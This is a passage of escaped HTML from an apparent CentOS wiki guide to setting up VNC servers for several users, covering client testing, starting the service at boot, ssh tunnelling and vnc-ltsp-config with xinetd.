1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;2.6. Test each VNC user&lt;/h3&gt;&lt;span class="anchor" id="line-121"&gt;&lt;/span&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h4 id="head-dfa9273a7c8eb8be0310b9264105d5f97ca3f6e4" style="font-size: 1.2em; line-height: 1.4em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(41, 99, 166); border-bottom-style: none; border-bottom-width: initial; border-bottom-color: initial; "&gt;2.6.1. Testing with a java enabled browser&lt;/h4&gt;&lt;span class="anchor" id="line-122"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Let us assume that mymachine has an IP address of 192.168.0.10. The URL to connect to each of the users will be:&lt;span class="anchor" id="line-123"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-124"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-125"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;Larry is http://192.168.0.10:5801 &lt;span class="anchor" id="line-126"&gt;&lt;/span&gt;Moe   is http://192.168.0.10:5802 &lt;span class="anchor" id="line-127"&gt;&lt;/span&gt;Curly is http://192.168.0.10:5803 &lt;span class="anchor" id="line-128"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-129"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Connect to &lt;a class="http" href="http://192.168.0.10:5801/" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;http://192.168.0.10:5801&lt;/a&gt;. A java applet window will pop-up showing a connection to your machine at port 1. Click the [ok] button. Enter larry's VNC password, and a 640x480 window should open using the default window manager selected for &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;larry&lt;/tt&gt; . The above ports &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt; 5801, 5802 and 5803 &lt;/tt&gt; must be open in the firewall &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;{iptables&lt;/tt&gt;) for the source IP addresses or subnets of a given client.&lt;span class="anchor" id="line-130"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-131"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h4 id="head-7365b7dbe31f6dd31219128df377372946891c84" style="font-size: 1.2em; line-height: 1.4em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(41, 99, 166); border-bottom-style: none; border-bottom-width: initial; border-bottom-color: initial; "&gt;2.6.2. Testing with a vnc client&lt;/h4&gt;&lt;span class="anchor" id="line-132"&gt;&lt;/span&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-133"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;For Larry: vncviewer 192.168.0.10:1 &lt;span class="anchor" id="line-134"&gt;&lt;/span&gt;For   Moe: vncviewer 192.168.0.10:2 &lt;span class="anchor" id="line-135"&gt;&lt;/span&gt;For Curly: vncviewer 192.168.0.10:3 &lt;span class="anchor" id="line-136"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-137"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;To test &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;larry&lt;/tt&gt; using vncviewer, &lt;strong&gt;vncviewer 192.168.0.10:1&lt;/strong&gt;. Enter Larry's VNC password, and a 640x480 window should open using Larry's default window manager. The vncviewer client will connect to port 590X where X is an offset of 1,2,3 for Larry, Moe, and Curly respectively, so these ports must be open in the firewall for the IP addresses or subnets of the clients.&lt;span class="anchor" id="line-138"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-139"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h4 id="head-409625f2ba4b1df0cd47334368a775e6416d5783" style="font-size: 1.2em; line-height: 1.4em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(41, 99, 166); border-bottom-style: none; border-bottom-width: initial; border-bottom-color: initial; "&gt;2.6.3. Starting vncserver at boot&lt;/h4&gt;&lt;span class="anchor" id="line-140"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;To start vncserver at boot, enter the command &lt;em&gt;&lt;strong&gt;/sbin/chkconfig vncserver on&lt;/strong&gt;&lt;/em&gt;.&lt;span class="anchor" id="line-141"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-142"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;strong&gt;For basic VNC configuration the procedure is now complete. The &lt;span class="anchor" id="line-143"&gt;&lt;/span&gt;following sections are optional refinements to enhance security and &lt;span class="anchor" id="line-144"&gt;&lt;/span&gt;functionality.&lt;/strong&gt;&lt;span class="anchor" id="line-145"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-146"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h2 id="head-f4875017c8bdcb37fce770575ae8decf0e9f185d" style="font-size: 1.4em; line-height: 1.8em; margin-top: 1.6em; margin-right: 0px; margin-bottom: 0.8em; margin-left: 0px; padding-left: 0.7em; background-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-h2-background.png); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; color: rgb(7, 43, 97); "&gt;3. VNC encrypted through an ssh tunnel&lt;/h2&gt;&lt;span class="anchor" id="line-147"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;You will be connecting through an ssh tunnel. You will need to be able to ssh to a user on the machine. For this example, the user on the vncserver machine is Larry.&lt;span class="anchor" id="line-148"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-149"&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol type="1" style="padding-left: 0.5em; margin-left: 3em; margin-bottom: 0.3em; list-style-image: none !important; "&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Edit /etc/sysconfig/vncservers, and add the option -localhost.&lt;span class="anchor" id="line-150"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-151"&gt;&lt;/span&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;VNCSERVERS="1:larry 2:moe 3:curly" &lt;span class="anchor" id="line-152"&gt;&lt;/span&gt;VNCSERVERARGS[1]="-geometry 640x480 -localhost" &lt;span class="anchor" id="line-153"&gt;&lt;/span&gt;VNCSERVERARGS[2]="-geometry 640x480 -localhost" &lt;span class="anchor" id="line-154"&gt;&lt;/span&gt;VNCSERVERARGS[1]="-geometry 800x600 -localhost" &lt;span class="anchor" id="line-155"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-156"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;&lt;p class="line891" style="margin-top: 0.25em; margin-right: 0px; margin-bottom: 0.3em; margin-left: 0px !important; line-height: 1.5em; padding-left: 0px; "&gt;&lt;em&gt;&lt;strong&gt;/sbin/service vncserver restart&lt;/strong&gt;&lt;/em&gt;&lt;span class="anchor" id="line-157"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Go to another machine with vncserver and test the VNC.&lt;span class="anchor" id="line-158"&gt;&lt;/span&gt;&lt;ol type="a" style="padding-left: 0.5em; margin-left: 1.5em; margin-bottom: 0.3em; list-style-image: none !important; margin-top: 0.3em; "&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;&lt;p class="line891" style="margin-top: 0.25em; margin-right: 0px; margin-bottom: 0.3em; margin-left: 0px !important; line-height: 1.5em; padding-left: 0px; "&gt;&lt;em&gt;&lt;strong&gt;vncviewer -via &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;larry@192.168.0.10&lt;/tt&gt; localhost:1&lt;/strong&gt;&lt;/em&gt;&lt;span class="anchor" id="line-159"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;&lt;p class="line891" style="margin-top: 0.25em; margin-right: 0px; margin-bottom: 0.3em; margin-left: 0px !important; line-height: 1.5em; padding-left: 0px; "&gt;&lt;em&gt;&lt;strong&gt;vncviewer -via &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;moe@192.168.0.10&lt;/tt&gt; localhost:2&lt;/strong&gt;&lt;/em&gt;&lt;span class="anchor" id="line-160"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;&lt;p class="line891" style="margin-top: 0.25em; margin-right: 0px; margin-bottom: 0.3em; margin-left: 0px !important; line-height: 1.5em; padding-left: 0px; "&gt;&lt;em&gt;&lt;strong&gt;vncviewer -via &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;curly@192.168.0.10&lt;/tt&gt; localhost:3&lt;/strong&gt;&lt;/em&gt;&lt;span class="anchor" id="line-161"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-162"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;By default, many vncviewers will disable compression options for what it thinks is a "local" connection. Make sure to check with the vncviewer man page to enable/force compression. If not, performance may be very poor!&lt;span class="anchor" id="line-163"&gt;&lt;/span&gt;&lt;/p&gt;&lt;h2 id="head-d4eb215e77a5372a141fab8cd8afd5941df55ae3" style="font-size: 1.4em; line-height: 1.8em; margin-top: 1.6em; margin-right: 0px; margin-bottom: 0.8em; margin-left: 0px; padding-left: 0.7em; background-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-h2-background.png); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; color: rgb(7, 43, 97); "&gt;4. Recovery from a logout&lt;/h2&gt;&lt;span class="anchor" id="line-164"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;If you logout of your desktop manager, it is gone!&lt;span class="anchor" id="line-165"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-166"&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul style="padding-left: 0.5em; margin-left: 3em; margin-bottom: 0.3em; list-style-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-ul.png); list-style-type: circle; list-style-position: initial; "&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; list-style-type: none; "&gt;We added a line to xstartup to give us an xterm where we can restart our window manager.&lt;span class="anchor" id="line-167"&gt;&lt;/span&gt;&lt;ul style="padding-left: 0.5em; margin-left: 1.5em; margin-bottom: 0.3em; list-style-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-ul.png); list-style-type: circle; list-style-position: initial; margin-top: 0.3em; "&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;&lt;p class="line862" style="margin-top: 0.25em; margin-right: 0px; margin-bottom: 0.3em; margin-left: 0px !important; line-height: 1.5em; padding-left: 0px; "&gt;For gnome, enter &lt;em&gt;&lt;strong&gt;gnome-session&lt;/strong&gt;&lt;/em&gt;.&lt;span class="anchor" id="line-168"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;&lt;p class="line862" style="margin-top: 0.25em; margin-right: 0px; margin-bottom: 0.3em; margin-left: 0px !important; line-height: 1.5em; padding-left: 0px; "&gt;For kde, enter &lt;em&gt;&lt;strong&gt;startkde&lt;/strong&gt;&lt;/em&gt;.&lt;span class="anchor" id="line-169"&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h2 id="head-29f6855e8f3684dc6c005d4399f60886edf611ec" style="font-size: 1.4em; line-height: 1.8em; margin-top: 1.6em; margin-right: 0px; margin-bottom: 0.8em; margin-left: 0px; padding-left: 0.7em; background-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-h2-background.png); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; color: rgb(7, 43, 97); "&gt;5. VNC-Sever setup with no hassles with vnc-ltsp-config&lt;/h2&gt;&lt;span class="anchor" id="line-170"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;To allow all users login screen access via a vnc-client to the system, you can use vnc-ltsp-config and xinetd. When a vnc-client connects to one of the configured ports, the user will be given a default standard login screen. The sessions will *not* be persistent. When a user logs out, the session is gone.&lt;span class="anchor" id="line-171"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-172"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;The rpm package vnc-ltsp-config is easily installed via the EPEL repository noted near the bottom of &lt;a class="http" href="http://wiki.centos.org/AdditionalResources/Repositories" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;http://wiki.centos.org/AdditionalResources/Repositories&lt;/a&gt;&lt;span class="anchor" id="line-173"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-174"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Note: There are no major dependencies for the package so the vnc-ltsp-config*.rpm could easily be downloaded and installed without the need for enabling the EPEL repository.&lt;span class="anchor" id="line-175"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-176"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Install, as root via:&lt;span class="anchor" id="line-177"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-178"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;# yum install xinetd vnc-ltsp-config  &lt;span class="anchor" id="line-179"&gt;&lt;/span&gt;# /sbin/chkconfig xinetd on &lt;span class="anchor" id="line-180"&gt;&lt;/span&gt;# /sbin/chkconfig vncts on &lt;span class="anchor" id="line-181"&gt;&lt;/span&gt;# /sbin/service xinetd restart &lt;span class="anchor" id="line-182"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-183"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;This will add the ability to get the following default vnc-client based session connecitons:&lt;span class="anchor" id="line-184"&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;table style="margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; border-collapse: collapse; "&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;resolution&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;color-depth&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;port&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;span class="anchor" id="line-185"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;1024x768&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;16&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;5900/tcp&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;span class="anchor" id="line-186"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;800x600&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;16&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;5901/tcp&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;span class="anchor" id="line-187"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;640x480&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;16&lt;/p&gt;&lt;/td&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;p class="line862" style="margin-top: 0.5em !important; margin-right: 0.5em !important; margin-bottom: 0.5em !important; margin-left: 0.5em !important; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; line-height: 1.5em; "&gt;5902/tcp&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="border-top-width: 1pt; border-right-width: 1pt; border-bottom-width: 1pt; border-left-width: 1pt; border-style: initial; border-color: initial; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 0.25em; padding-right: 0.5em; padding-bottom: 0.25em; padding-left: 0.5em; "&gt;&lt;span class="anchor" id="line-188"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-top: 0.5em !important; 